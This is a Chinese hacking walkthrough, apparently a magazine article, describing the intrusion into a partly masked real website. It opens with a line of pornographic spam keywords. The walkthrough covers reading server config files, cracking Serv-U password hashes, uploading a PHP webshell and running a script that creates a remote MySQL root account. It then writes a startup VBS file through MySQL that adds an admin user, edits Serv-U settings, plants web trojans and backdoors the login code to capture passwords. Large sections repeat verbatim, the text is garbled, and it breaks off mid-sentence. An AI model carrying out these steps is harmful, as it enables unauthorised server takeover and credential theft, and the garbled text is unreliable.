欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

在http://www.*****.net/down/show.php頁(yè)面的左上角有個(gè)上"管理"鏈接??！點(diǎn)開(kāi)一看原來(lái)是個(gè)空鏈接;再點(diǎn)"上傳"，需要登錄，這是夜貓文章系統的面頁(yè)，哪我們就在來(lái)看看它的文章系統。利用CASI先查看配置文件的內容：http://www.*****.net/article/include/config.inc.php內容與下載系統的差不多。內容如下圖所示:碰碰運氣，進(jìn)入下載系統的用戶(hù)和密碼登錄管理頁(yè)面，登錄失??！在兩個(gè)系統的配置文件中，我們可以知道它們的數據庫名分別為download和article因為文章系統沒(méi)找注入漏洞，沒(méi)辦法讀出它的用戶(hù)名和密碼，哪能不能通過(guò)下載系統的實(shí)現跨庫查詢(xún)呢？（我沒(méi)有成功！如哪位高手實(shí)現請轉告）難道就沒(méi)有辦法了嗎？MYSQL的密碼會(huì )留在C:\windows\my.ini(注意:win2000是c:\winnt\my.ini,win2003是c:\windows\my.ini)文件中,查看其內容,暈沒(méi)找到文件,看來(lái)是管理員把文件刪了或移到別的目錄下了!MYSQL中的數據庫和庫中的表是如何存放在計算機中的呢？答案：/mysql/data/數據庫名/表名.后綴名（后綴名有MYD，FRM，MYI，      其中MYD中存放了表中的所有內容）。利用管理員在裝軟件時(shí)默認路徑的習慣，我們可以很容易的猜出我們想要的文件的物理路徑。利用CASI看C:\mysql\data\mysql\user.myd的文件內容如下：7­利 localhostroot66121efb4645a6root66121efb4645a6root66121efb4645a6; ? localhostdownload7d27f0db44**ea1d[1][1][1][1][1][1][1][1][1]Hd5d33a536[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1] 4a[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1]管理員根本沒(méi)有開(kāi)遠程用戶(hù)(localhost表示本地連接，%表示可以遠程連接)，利用牛族MYSQL連接器沒(méi)辦法遠程登錄了！看來(lái)又是那句話(huà)："此路不通" ?？纯碿:\mysql\data\download\username.myd的內容，我們前面得到的下載系統的用戶(hù)名和密碼在里面了^_^；在看看c:\mysql\data\article\user.myd文件內容，頁(yè)面顯示無(wú)，暈，是此表不存在還是內容為空？（這又是管理員做了設置吧?。┛磥?lái)想進(jìn)入文章系統的后臺，又是那句話(huà)"此路不通"！還是從常記憶吧！; ? localhostdownload7d27f0db44**ea1d[1][1][1][1][1][1][1][1][1]Hd5d33a536[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1] 4a[1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1][1]管理員根本沒(méi)有開(kāi)遠程用戶(hù)(localhost表示本地連接，%表示可以遠程連接)，利用牛族MYSQL連接器沒(méi)辦法遠程登錄了！看來(lái)又是那句話(huà)："此路不通" ?？纯碿:\mysql\data\download\username.myd的內容，我們前面得到的下載系統的用戶(hù)名和密碼在里面了^_^；在看看c:\mysql\data\article\user.myd文件內容，頁(yè)面顯示無(wú)，暈，是此表不存在還是內容為空？（這又是管理員做了設置吧?。┛磥?lái)想進(jìn)入文章系統的后臺，又是那句話(huà)"此路不通"！還是從長(cháng)計議吧！②HSACN掃出新思路拿出Hscan.exe這個(gè)短小精悍的掃描工具，掃描結果如下：開(kāi)了21端口，登錄一試還是SERV-U5.0來(lái)。再次利用CASI查看：C:\Program Files\Serv-U\ServUDaemon.ini(這個(gè)也是SERV-U的默認安裝路徑)的內容！這可是個(gè)核心文件??！里面記錄了很多重要內容：如用戶(hù)名，用戶(hù)數，密碼，用戶(hù)所在的目錄以及對此目錄的操作權限等。主要內容如下：[GLOBAL]Version=5.0.0.4.........[DOMAINS]Domain1=211.92.***.*||21|***.net|1|0|0[Domain1]User1=b******n|1|0......[USER=b******n|1]Password=gk5****EF75***2A8182464CD7EE8B***CHomeDir=d:\s***n\ a***lover\photo\galleryRelPaths=1TimeOut=600Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDPSKEYValues=......③深挖SERV-U密碼方法一：爆破法．最顯眼的要屬用戶(hù)名和密碼了，關(guān)鍵是如何破密碼呢？到網(wǎng)上搜了一個(gè)專(zhuān)門(mén)破SERV-U密碼的工具（Serv-UPassCrack1.0a.rar），太慢了，這要等到何年何月??！干脆用記事本打開(kāi)它的腳本crack.vbs．看看解密原理：假設原來(lái)明文密碼用"password_mingwen"表示，密文密碼也就是我們在ServUDaemon.ini中看到的密碼（34位），用"password_miwen"表示,密文的前兩位合并上明文，然后經(jīng)MD5加密后正好等于密文的后三十二位！即：md5（password_mingwen+left(password_miwen,2)=right(password_miwen,32)俗話(huà)說(shuō)的好啊，"工欲善其事，必先利其器"在網(wǎng)上找了兩上絕配的工具！一個(gè)是MD5CrackSpV2.3(速度增強版,一個(gè)非常好用的MD5爆破工具)，另一個(gè)是字典專(zhuān)家.BBSt,利用它我們可以生成前兩位為我們指定字母的字典??！MD5CrackSpV2.3速度奇快,我們可以指定開(kāi)的線(xiàn)程數,我在P4,256M內存環(huán)境下做了一個(gè)測試,利用字典專(zhuān)家.BBSt生成一個(gè)含3億條記錄,1.2G左右的字典, 用MD5CrackSpV2.3開(kāi)8線(xiàn)程跑,總共用了30分鐘!一個(gè)線(xiàn)程一秒鐘跑大約2萬(wàn)條記錄,8個(gè)線(xiàn)程一秒鐘,就是16萬(wàn)條記錄!!照此計算一臺機器一天就能跑約138億條記錄!假如有十臺P4連合作業(yè),威力無(wú)窮啊!同時(shí)在網(wǎng)上看到消息說(shuō)山東大學(xué)已經(jīng)研究出來(lái)了破解MD5的算法！但是沒(méi)有找到具體的程序，程序一旦出世,密而不密,恐怕很多網(wǎng)站又要遭殃了!!方法二：程序法．不要在一棵樹(shù)上吊死，一邊掛著(zhù)字典爆破，一邊看看還有沒(méi)有別的途徑，雙管齊下嗎，要不閑著(zhù)也是閑著(zhù)（哈哈）！在c:\Program Files\Serv-U\ServUDaemon.ini文件中共有十多位用戶(hù)，其中有一個(gè)的用戶(hù)目錄："d:\s***n\a***lover\photo\gallery" 吸引了我。立即在瀏覽器中打上http://www.*****.net/ a***lover/photo/gallery 出現如下提示："This Virtual Directory does not allow contents to be listed"，在試試它的上一級目錄看看：http://www.*****.net/ a***lover/photo/真是山重水復疑無(wú)路，柳暗花明又一村??！原來(lái)在機子里還藏著(zhù)個(gè)某某網(wǎng)絡(luò )相冊．首先注冊個(gè)用戶(hù)進(jìn)去看看，有圖片上傳功能啊，抓包看看是否存在有類(lèi)似動(dòng)網(wǎng)UPFILE的漏洞，用NC提交后失敗了，上傳類(lèi)型還是圖片文件，又是那句話(huà)："此路不通"。利用CASI查看http://www.*****.net/ a***lover/photo/index.php的文件內容得知：程序中文名稱(chēng)：文本圖片管理程序 程序英文名稱(chēng)：NEATPIC  版本：2.0.13 BETA，老規矩先到網(wǎng)上下個(gè)研究研究在說(shuō)。經(jīng)過(guò)分析目錄結構發(fā)現在：database/user.php文件用于存放用戶(hù)名密碼等注冊信息！用CASI打開(kāi)：http://www.*****.net/ a***lover/photo/database/user.php顯示無(wú)文件內容！難道是默認目錄不對？！管理員把目錄改了??！看配置文件：http://www.*****.net/ a***lover/photo/inc/config.inc.php發(fā)現：// 參數設置//*********************************$DataDir = "database678"; //雜項數據存放目錄$CatDir = "second"; //二級分類(lèi)數據存放目錄$SortDir = "main"; //分類(lèi)數據文件存放目錄$PicRecordDir = "picdata"; //圖片數據總目錄$PicDir = "pic"; //圖片文件存放目錄$SPicDir = "spic"; //縮略圖存放目錄$CommentDir = "comment"; //圖片評論目錄$UserDat = "user.php"; //用戶(hù)數據文件$Dat = "dat.php"; //相冊數據文件果然管理員把默認的database目錄改成了database678了！現在可以用CASI查看user.php的內容了如下圖：最下面的哪一行即ID=1的為管理員的注冊信息，第一個(gè)為用戶(hù)名，第二個(gè)為密碼。發(fā)現該用戶(hù)名與ServUDaemon.ini中的相同，密碼會(huì )不會(huì )也相同呢？（很多人都有使用同一密碼的習慣?。。┐蜷_(kāi)DOS窗口-->登錄FTP-->輸入用戶(hù)名和密碼，成功了，終于成功了！揪出這個(gè)密碼可真不容易?。?！這時(shí)字典還在哪掛著(zhù)來(lái)，要跑出這個(gè)8位純字母的密碼也要費一段時(shí)間?。?！一、 上傳PHPSHELL，控制MYSQL數據庫通過(guò)ServUDaemon.ini文件中的Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDP知道該用戶(hù)具有：讀取(R)，寫(xiě)入(W)，追加(A)等功能，唯獨缺少了"執行(E)"功能！利用PUT命令上傳一個(gè)一句話(huà)的WebShell上去.在瀏覽器中運行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出現:Warning: passthru(): Unable to fork [dir] in D:\s***n\a***lover\photo\gallery\webshell.php on line 1看來(lái)外部命令不能執行,管理員一定作了相應設置.再上傳一個(gè)phpinfo.php文件 在瀏覽器中運行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,這時(shí)在php.ini變量的設置都顯示出來(lái)了(當然也你可以利用CASI看c:\windows\php.ini 的內容)！外部命令不能執行的原因在此：safe_modeOffOffsafe_mode_exec_dirno valueno valuesafe_mode_gidOffOffsafe_mode_include_dirno valueno value接下來(lái)上傳一個(gè)自己編的僅帶有瀏覽，拷貝，重命名，刪除文件和上傳文件五個(gè)功能的PHPSHELL：CMD.PHP注:由于時(shí)間倉促代碼界面沒(méi)優(yōu)化好，在dir文本框中輸入要瀏覽的目錄名稱(chēng);copy文本框中,上面輸入源文件如d:\web\cmd.php，下面輸入目標文件如d:\web\cmdbak.php;del文本框中輸入要刪除的文件名如：d:\web\cmdbak.php;ren命令與copy命令相似;點(diǎn)瀏覽按鈕,選擇你要上傳的文件,然后點(diǎn)upload按鈕,就上傳到與本SHELL相同的目錄下了.運行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D盤(pán),C:\windows,以及C:\Program Files下的內容,而且對D盤(pán)還有寫(xiě)權限!在通過(guò)copy命令把想下載的軟件考到WEB目錄下下載下來(lái)了^_^如何才能把文件寫(xiě)到只讀的C盤(pán)上呢這就要通過(guò)MYSQL了!但是MYSQL沒(méi)有遠程連接啊!沒(méi)有條件創(chuàng )造條件,看文章系統的配置文件config.inc.php的內容了嗎？$dbhost="localhost";//數據庫主機名$dbuser="root";//數據庫用戶(hù)名$dbpass="******";//數據庫密碼$dbname="article";//數據庫名數據庫用戶(hù)名和密碼都知道了，可惜的是本地用戶(hù)，然而我們能不能通過(guò)本地有最高權限用戶(hù)root來(lái)添加個(gè)遠程用戶(hù)呢？答案是肯定的。為此專(zhuān)門(mén)寫(xiě)了個(gè)程序adduser.php利用已知的有ROOT權限的賬號添寫(xiě)加遠程ROOT權限的賬號，內容如下：$dbh=mysql_connect(‘localhost:3306‘,‘root‘,‘*****‘);//echo mysql_errno().": ".mysql_error()."";mysql_select_db(‘mysql‘);echo mysql_errno().": ".mysql_error()."";$query="GRANT ALL PRIVILEGES ON *.* TO username@‘%‘IDENTIFIED BY ‘password‘ WITH GRANT OPTION";$res=mysql_query($query, $dbh);echo mysql_errno().": ".mysql_error()."";$err=mysql_error();if($err){echo "ERROR！";}else{echo "ADD USER OK！";}?>利用cmd.php上傳adduser.php執行后，就在庫中添加了一個(gè)遠程ROOT賬號，就可以用CASI帶的MYSQL連接器連上了??！它可以把MYSQL庫關(guān)了??！用牛族可方便的瀏覽表中的記錄??！如下圖：帶%號的用戶(hù)為添加的遠程用戶(hù)。四、 提升權限FTP是ServU5.0.0.4又有用戶(hù)名和密碼,自然會(huì )想到是否存在溢出,在網(wǎng)上搜個(gè)工具sftp執行Sftp -I 211.92.***.*** -u b*****b -p ****** -t 1 -o 1 -p 21后沒(méi)有溢出成功，看來(lái)是管理員打了補??！哪只好想別的辦法了！(-I 表示ip地址,-u 用戶(hù)名,-p 密碼-o操作系統類(lèi)型,-p 端口號) 以下總結了幾種提升權限的方法供大參考：方法一、打開(kāi)牛族MYSQL連接器，在命令行上輸入：user download;create table cmdphp (cmd TEXT);insert into cmdphp values("set wshshell=createobject(\"wscript.shell\")");insert into cmdphp values("a=wshshell.run(\"cmd.exe /c net user hello hello\",0)");insert  into  cmdphp  values("b=wshshell.run(\"cmd.exe /c net user localgroup administrators hello /add\",0)");select * from cmdphp into outfile "c:\\Documents and Settings\\Administrator\\[開(kāi)始]菜單\\程序\\啟動(dòng)\\cmdphp.vbs";注意：在路徑中要用"\\"而不是"\"，要加雙引號時(shí)，前面必需加"\"。原理是：我們在download數據庫中，建了一個(gè)表cmdphp，表中共一個(gè)字段cmd，我們把要執行的命令寫(xiě)到表中，然后在在表中導出到啟動(dòng)菜單中！這樣只要一重起后，我們就會(huì )得到一個(gè)管理員級的用戶(hù)hello了。d:\s***n\a***lover\photo\gallery方法二、修改SERV-U的文件ServUDaemon.ini中的相應內容：Password=hq50AAF4CB3FA4EF89C9E9D605B20B2971HomeDir=c:\RelPaths=1TimeOut=600Access1=D:\s***n\ a***lover\photo\gallery |RWAMELCDPMaintenance=SystemSKEYValues=把密碼換成我們知道的密碼，把主目錄換成c:\，Access1后的目錄可以不用換，這樣使管理員在SERV-U里看起來(lái)還是以前的目錄名，|RWAMELCDP這一串是關(guān)鍵，我們比以前多加了一個(gè)"E"代表我們有"執行"權限，Maintenance=System表示我們的身份是管理員。在本地設置好后，就開(kāi)始想辦法，替換掉它的文件？首先，利用我的哪個(gè)cmd.。php SHELL的上傳文件功能，先把它上傳到d:\s***n\a***lover\photo\gallery目錄（上傳成功后文件與SHELL在同一目錄）下，同樣再打開(kāi)牛族MYSQL連接器：user download;create table servu (cmd TEXT);load data infile "d:\\s***n\\a***lover\\photo\\gallery\\ServUDaemon.ini;select * from servu into outfile "C:\Program Files\Serv-U\ServUDaemon.ini";條件是SERV-U重啟后，我們的哪個(gè)用戶(hù)就是管理員了，而且在C盤(pán)根目錄下具有可執行權限。登上SERV-U服務(wù)器上執行如下命令：quote site exec net.exe user hello hello /addquote site exec net.exe localgroup administrators hello /add這樣我們就得到了一個(gè)管理員級的用戶(hù)hello。如果沒(méi)有開(kāi)3389我們可以利用PUT上傳給它上傳個(gè)3389.EXE,然后用quote執行后，就可以用3389登錄器連接了！同樣我們也可以利用另外一個(gè)小工具xyzcmd.exe在DOS下登錄，會(huì )得到一個(gè)CMDSHELL.方法三：由于管理員在PHP.INI中做了一些限制，上傳的PHPSHELL沒(méi)法執行外部命令，利用CMD.PHP的瀏覽命令，你可以在它的上面找到它的PHP和SERV-U的安裝程序，DOWN下來(lái)，在本機上模擬它的環(huán)境，配置自己的PHP.INI文件，使它能夠執行外部命令，解釋ASP和CGI，然后利用方法二替換掉它的PHP.INI文件。也有個(gè)條件就是WEB重啟后才能生效。我們需要一個(gè)小東西－FPIPE.EXE端口重定向工具！fpipe -v -l 5210 -s 5209 -r 43958  127.0.0.1(把本機的43958端口，通過(guò)5209端口，轉發(fā)到5210端口)打開(kāi)你本地SERV-U添加一臺服務(wù)器，來(lái)連接5210,填上服務(wù)器IP，監聽(tīng)端口號5210，填上帳戶(hù)和密碼！                  user：LocalAdministrator    pass：#l@$ak#.lk;0@P全部搞定后，來(lái)連接SERV-U，連接成功后，我們就對此服務(wù)器SERV-U有了完全控制權限！然后登錄上SERV-U加管理員用戶(hù)就OK了！方法四:社會(huì )工程學(xué)加網(wǎng)頁(yè)木馬!在04年黑防第6期我的朋友血漢的《網(wǎng)頁(yè)木馬讓你肉雞成群》一文中，講了許多做木馬的方法，在這里就不啰嗦了，省的老獨說(shuō)轉稿費，哈哈！把"馬"傳上去后，可以在論壇里發(fā)個(gè)貼子，如"管理員我發(fā)現了此網(wǎng)站一個(gè)漏洞！"或"管理員我對網(wǎng)站有幾點(diǎn)建議"估計不久真的會(huì )成為"養雞專(zhuān)業(yè)戶(hù)了"。建議不要改人家的主頁(yè)，一來(lái)不好，二來(lái)如果掛在主頁(yè)上，管理員看到后不一定會(huì )點(diǎn)開(kāi)！還有更隱蔽的一招，就是修改源程序（估計一般管理員不會(huì )沒(méi)事讀源程序吧^_^），找到網(wǎng)站登錄的程序，加一段程序，可以根據ID來(lái)判斷是管理員，如果是把他的密碼（在如MD5加密前）插入到你的信箱或QQ等字段中，這樣你可以打開(kāi)你的用戶(hù)資料來(lái)看了??！接下來(lái)談?wù)勅绾谓蟹?wù)器重起：方法一、我非常建議用的方法哪就是DOS攻擊！方法二、如果你上傳的SHELL能執行命令！可以傳一個(gè)很簡(jiǎn)單的C程序，讓它不斷地MALLOC分配內存，而且不FREE。#include#includemain(){for(; ;) malloc(0xffffff);}方法三、如果一些網(wǎng)站是PHP的不能執行外部命令（我們上傳上去的可執行文件不能運行）！哪位高手編一個(gè)PHP程序耗掉它的資源！②HSACN掃出新思路拿出Hscan.exe這個(gè)短小精悍的掃描工具，掃描結果如下：開(kāi)了21端口，登錄一試還是SERV-U5.0來(lái)。再次利用CASI查看：C:\Program Files\Serv-U\ServUDaemon.ini(這個(gè)也是SERV-U的默認安裝路徑)的內容！這可是個(gè)核心文件??！里面記錄了很多重要內容：如用戶(hù)名，用戶(hù)數，密碼，用戶(hù)所在的目錄以及對此目錄的操作權限等。主要內容如下：[GLOBAL]Version=5.0.0.4.........[DOMAINS]Domain1=211.92.***.*||21|***.net|1|0|0[Domain1]User1=b******n|1|0......[USER=b******n|1]Password=gk5****EF75***2A8182464CD7EE8B***CHomeDir=d:\s***n\ a***lover\photo\galleryRelPaths=1TimeOut=600Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDPSKEYValues=......③深挖SERV-U密碼方法一：爆破法．最顯眼的要屬用戶(hù)名和密碼了，關(guān)鍵是如何破密碼呢？到網(wǎng)上搜了一個(gè)專(zhuān)門(mén)破SERV-U密碼的工具（Serv-UPassCrack1.0a.rar），太慢了，這要等到何年何月??！干脆用記事本打開(kāi)它的腳本crack.vbs．看看解密原理：假設原來(lái)明文密碼用"password_mingwen"表示，密文密碼也就是我們在ServUDaemon.ini中看到的密碼（34位），用"password_miwen"表示,密文的前兩位合并上明文，然后經(jīng)MD5加密后正好等于密文的后三十二位！即：md5（password_mingwen+left(password_miwen,2)=right(password_miwen,32)俗話(huà)說(shuō)的好啊，"工欲善其事，必先利其器"在網(wǎng)上找了兩上絕配的工具！一個(gè)是MD5CrackSpV2.3(速度增強版,一個(gè)非常好用的MD5爆破工具)，另一個(gè)是字典專(zhuān)家.BBSt,利用它我們可以生成前兩位為我們指定字母的字典??！MD5CrackSpV2.3速度奇快,我們可以指定開(kāi)的線(xiàn)程數,我在P4,256M內存環(huán)境下做了一個(gè)測試,利用字典專(zhuān)家.BBSt生成一個(gè)含3億條記錄,1.2G左右的字典, 用MD5CrackSpV2.3開(kāi)8線(xiàn)程跑,總共用了30分鐘!一個(gè)線(xiàn)程一秒鐘跑大約2萬(wàn)條記錄,8個(gè)線(xiàn)程一秒鐘,就是16萬(wàn)條記錄!!照此計算一臺機器一天就能跑約138億條記錄!假如有十臺P4連合作業(yè),威力無(wú)窮啊!同時(shí)在網(wǎng)上看到消息說(shuō)山東大學(xué)已經(jīng)研究出來(lái)了破解MD5的算法！但是沒(méi)有找到具體的程序，程序一旦出世,密而不密,恐怕很多網(wǎng)站又要遭殃了!!方法二：程序法．不要在一棵樹(shù)上吊死，一邊掛著(zhù)字典爆破，一邊看看還有沒(méi)有別的途徑，雙管齊下嗎，要不閑著(zhù)也是閑著(zhù)（哈哈）！在c:\Program Files\Serv-U\ServUDaemon.ini文件中共有十多位用戶(hù)，其中有一個(gè)的用戶(hù)目錄："d:\s***n\a***lover\photo\gallery" 吸引了我。立即在瀏覽器中打上http://www.*****.net/ a***lover/photo/gallery 出現如下提示："This Virtual Directory does not allow contents to be listed"，在試試它的上一級目錄看看：http://www.*****.net/ a***lover/photo/真是山重水復疑無(wú)路，柳暗花明又一村??！原來(lái)在機子里還藏著(zhù)個(gè)某某網(wǎng)絡(luò )相冊．首先注冊個(gè)用戶(hù)進(jìn)去看看，有圖片上傳功能啊，抓包看看是否存在有類(lèi)似動(dòng)網(wǎng)UPFILE的漏洞，用NC提交后失敗了，上傳類(lèi)型還是圖片文件，又是那句話(huà)："此路不通"。利用CASI查看http://www.*****.net/ a***lover/photo/index.php的文件內容得知：程序中文名稱(chēng)：文本圖片管理程序 程序英文名稱(chēng)：NEATPIC  版本：2.0.13 BETA，老規矩先到網(wǎng)上下個(gè)研究研究在說(shuō)。經(jīng)過(guò)分析目錄結構發(fā)現在：database/user.php文件用于存放用戶(hù)名密碼等注冊信息！用CASI打開(kāi)：http://www.*****.net/ a***lover/photo/database/user.php顯示無(wú)文件內容！難道是默認目錄不對？！管理員把目錄改了??！看配置文件：http://www.*****.net/ a***lover/photo/inc/config.inc.php發(fā)現：// 參數設置//*********************************$DataDir = "database678"; //雜項數據存放目錄$CatDir = "second"; //二級分類(lèi)數據存放目錄$SortDir = "main"; //分類(lèi)數據文件存放目錄$PicRecordDir = "picdata"; //圖片數據總目錄$PicDir = "pic"; //圖片文件存放目錄$SPicDir = "spic"; //縮略圖存放目錄$CommentDir = "comment"; //圖片評論目錄$UserDat = "user.php"; //用戶(hù)數據文件$Dat = "dat.php"; //相冊數據文件果然管理員把默認的database目錄改成了database678了！現在可以用CASI查看user.php的內容了如下圖：最下面的哪一行即ID=1的為管理員的注冊信息，第一個(gè)為用戶(hù)名，第二個(gè)為密碼。發(fā)現該用戶(hù)名與ServUDaemon.ini中的相同，密碼會(huì )不會(huì )也相同呢？（很多人都有使用同一密碼的習慣?。。┐蜷_(kāi)DOS窗口-->登錄FTP-->輸入用戶(hù)名和密碼，成功了，終于成功了！揪出這個(gè)密碼可真不容易?。?！這時(shí)字典還在哪掛著(zhù)來(lái)，要跑出這個(gè)8位純字母的密碼也要費一段時(shí)間?。?！一、 上傳PHPSHELL，控制MYSQL數據庫通過(guò)ServUDaemon.ini文件中的Access1=D:\s***n\ a***lover\photo\gallery |RWAMLCDP知道該用戶(hù)具有：讀取(R)，寫(xiě)入(W)，追加(A)等功能，唯獨缺少了"執行(E)"功能！利用PUT命令上傳一個(gè)一句話(huà)的WebShell上去.在瀏覽器中運行http://www.*****.net/ a***lover/photo/gallery/webshell.php?cmd=dir,出現:Warning: passthru(): Unable to fork [dir] in D:\s***n\a***lover\photo\gallery\webshell.php on line 1看來(lái)外部命令不能執行,管理員一定作了相應設置.再上傳一個(gè)phpinfo.php文件 在瀏覽器中運行:http://www.*****.net/ a***lover/photo/gallery/phpinfo.php,這時(shí)在php.ini變量的設置都顯示出來(lái)了(當然也你可以利用CASI看c:\windows\php.ini 的內容)！外部命令不能執行的原因在此：safe_modeOffOffsafe_mode_exec_dirno valueno valuesafe_mode_gidOffOffsafe_mode_include_dirno valueno value接下來(lái)上傳一個(gè)自己編的僅帶有瀏覽，拷貝，重命名，刪除文件和上傳文件五個(gè)功能的PHPSHELL：CMD.PHP注:由于時(shí)間倉促代碼界面沒(méi)優(yōu)化好，在dir文本框中輸入要瀏覽的目錄名稱(chēng);copy文本框中,上面輸入源文件如d:\web\cmd.php，下面輸入目標文件如d:\web\cmdbak.php;del文本框中輸入要刪除的文件名如：d:\web\cmdbak.php;ren命令與copy命令相似;點(diǎn)瀏覽按鈕,選擇你要上傳的文件,然后點(diǎn)upload按鈕,就上傳到與本SHELL相同的目錄下了.運行: http://www.*****.net/ a***lover/photo/gallery/cmd.php,利用dir命令,可以看D盤(pán),C:\windows,以及C:\Program Files下的內容,而且對D盤(pán)還有寫(xiě)權限!在通過(guò)copy命令把想下載的軟件考到WEB目錄下下載下來(lái)了^_^如何才能把文件寫(xiě)到只讀的C盤(pán)上呢這就要通過(guò)MYSQL了!但是MYSQL沒(méi)有遠程連接啊!沒(méi)有條件創(chuàng )造條件,看文章系統的配置文件config.inc.php的內容了嗎？$dbhost="localhost";//數據庫主機名$dbuser="root";//數據庫用戶(hù)名$dbpass="******";//數據庫密碼$dbname="article";//數據庫名數據庫用戶(hù)名和密碼都知道了，可惜的是本地用戶(hù)，然而我們能不能通過(guò)本地有最高權限用戶(hù)root來(lái)添加個(gè)遠程用戶(hù)呢？答案是肯定的。為此專(zhuān)門(mén)寫(xiě)了個(gè)程序adduser.php利用已知的有ROOT權限的賬號添寫(xiě)加遠程ROOT權限的賬號，內容如下：$dbh=mysql_connect(‘localhost:3306‘,‘root‘,‘*****‘);//echo mysql_errno().": ".mysql_error()."";mysql_select_db(‘mysql‘);echo mysql_errno().": ".mysql_error()."";$query="GRANT ALL PRIVILEGES ON *.* TO username@‘%‘IDENTIFIED BY ‘password‘ WITH GRANT OPTION";$res=mysql_query($query, $dbh);echo mysql_errno().": ".mysql_error()."";$err=mysql_error();if($err){echo "ERROR！";}else{echo "ADD USER OK！";}?>利用cmd.php上傳adduser.php執行后，就在庫中添加了一個(gè)遠程ROOT賬號，就可以用CASI帶的MYSQL連接器連上了??！它可以把MYSQL庫關(guān)了??！用牛族可方便的瀏覽表中的記錄??！如下圖：帶%號的用戶(hù)為添加的遠程用戶(hù)。四、 提升權限FTP是ServU5.0.0.4又有用戶(hù)名和密碼,自然會(huì )想到是否存在溢出,在網(wǎng)上搜個(gè)工具sftp執行Sftp -I 211.92.***.*** -u b*****b -p ****** -t 1 -o 1 -p 21后沒(méi)有溢出成功，看來(lái)是管理員打了補??！哪只好想別的辦法了！(-I 表示ip地址,-u 用戶(hù)名,-p 密碼-o操作系統類(lèi)型,-p 端口號) 以下總結了幾種提升權限的方法供大參考：方法一、打開(kāi)牛族MYSQL連接器，在命令行上輸入：user download;create table cmdphp (cmd TEXT);insert into cmdphp values("set wshshell=createobject(\"wscript.shell\")");insert into cmdphp values("a=wshshell.run(\"cmd.exe /c net user hello hello\",0)");insert  into  cmdphp  values("b=wshshell.run(\"cmd.exe /c net user localgroup administrators hello /add\",0)");select * from cmdphp into outfile "c:\\Documents and Settings\\Administrator\\[開(kāi)始]菜單\\程序\\啟動(dòng)\\cmdphp.vbs";注意：在路徑中要用"\\"而不是"\"，要加雙引號時(shí)，前面必需加"\"。原理是：我們在download數據庫中，建了一個(gè)表cmdphp，表中共一個(gè)字段cmd，我們把要執行的命令寫(xiě)到表中，然后在在表中導出到啟動(dòng)菜單中！這樣只要一重起后，我們就會(huì )得到一個(gè)管理員級的用戶(hù)hello了。d:\s***n\a***lover\photo\gallery方法二、修改SERV-U的文件ServUDaemon.ini中的相應內容：Password=hq50AAF4CB3FA4EF89C9E9D605B20B2971HomeDir=c:\RelPaths=1TimeOut=600Access1=D:\s***n\ a***lover\photo\gallery |RWAMELCDPMaintenance=SystemSKEYValues=把密碼換成我們知道的密碼，把主目錄換成c:\，Access1后的目錄可以不用換，這樣使管理員在SERV-U里看起來(lái)還是以前的目錄名，|RWAMELCDP這一串是關(guān)鍵，我們比以前多加了一個(gè)"E"代表我們有"執行"權限，Maintenance=System表示我們的身份是管理員。在本地設置好后，就開(kāi)始想辦法，替換掉它的文件？首先，利用我的哪個(gè)cmd.。php SHELL的上傳文件功能，先把它上傳到d:\s***n\a***lover\photo\gallery目錄（上傳成功后文件與SHELL在同一目錄）下，同樣再打開(kāi)牛族MYSQL連接器：user download;create table servu (cmd TEXT);load data infile "d:\\s***n\\a***lover\\photo\\gallery\\ServUDaemon.ini;select * from servu into outfile "C:\Program Files\Serv-U\ServUDaemon.ini";條件是SERV-U重啟后，我們的哪個(gè)用戶(hù)就是管理員了，而且在C盤(pán)根目錄下具有可執行權限。登上SERV-U服務(wù)器上執行如下命令：quote site exec net.exe user hello hello /addquote site exec net.exe localgroup administrators hello /add這樣我們就得到了一個(gè)管理員級的用戶(hù)hello。如果沒(méi)有開(kāi)3389我們可以利用PUT上傳給它上傳個(gè)3389.EXE,然后用quote執行后，就可以用3389登錄器連接了！同樣我們也可以利用另外一個(gè)小工具xyzcmd.exe在DOS下登錄，會(huì )得到一個(gè)CMDSHELL.方法三：由于管理員在PHP.INI中做了一些限制，上傳的PHPSHELL沒(méi)法執行外部命令，利用CMD.PHP的瀏覽命令，你可以在它的上面找到它的PHP和SERV-U的安裝程序，DOWN下來(lái)，在本機上模擬它的環(huán)境，配置自己的PHP.INI文件，使它能夠執行外部命令，解釋ASP和CGI，然后利用方法二替換掉它的PHP.INI文件。也有個(gè)條件就是WEB重啟后才能生效。我們需要一個(gè)小東西－FPIPE.EXE端口重定向工具！fpipe -v -l 5210 -s 5209 -r 43958  127.0.0.1(把本機的43958端口，通過(guò)5209端口，轉發(fā)到5210端口)打開(kāi)你本地SERV-U添加一臺服務(wù)器，來(lái)連接5210,填上服務(wù)器IP，監聽(tīng)端口號5210，填上帳戶(hù)和密碼！                  user：LocalAdministrator    pass：#l@$ak#.lk;0@P全部搞定后，來(lái)連接SERV-U，連接成功后，我們就對此服務(wù)器SERV-U有了完全控制權限！然后登錄上SERV-U加管理員用戶(hù)就OK了！方法四:社會(huì )工程學(xué)加網(wǎng)頁(yè)木馬!在04年黑防第6期我的朋友血漢的《網(wǎng)頁(yè)木馬讓你肉雞成群》一文中，講了許多做木馬的方法，在這里就不啰嗦了，省的老獨說(shuō)轉稿費，哈哈！把"馬"傳上去后，可以在論壇里發(fā)個(gè)貼子，如"管理員我發(fā)現了此網(wǎng)站一個(gè)漏洞！"或"管理員我對網(wǎng)站有幾點(diǎn)建議"估計不久真的會(huì )成為"養雞專(zhuān)業(yè)戶(hù)了"。建議不要改人家的主頁(yè)，一來(lái)不好，二來(lái)如果掛在主頁(yè)上，管理員看到后不一定會(huì )點(diǎn)開(kāi)！還有更隱蔽的一招，就是修改源程序（估計一般管理員不會(huì 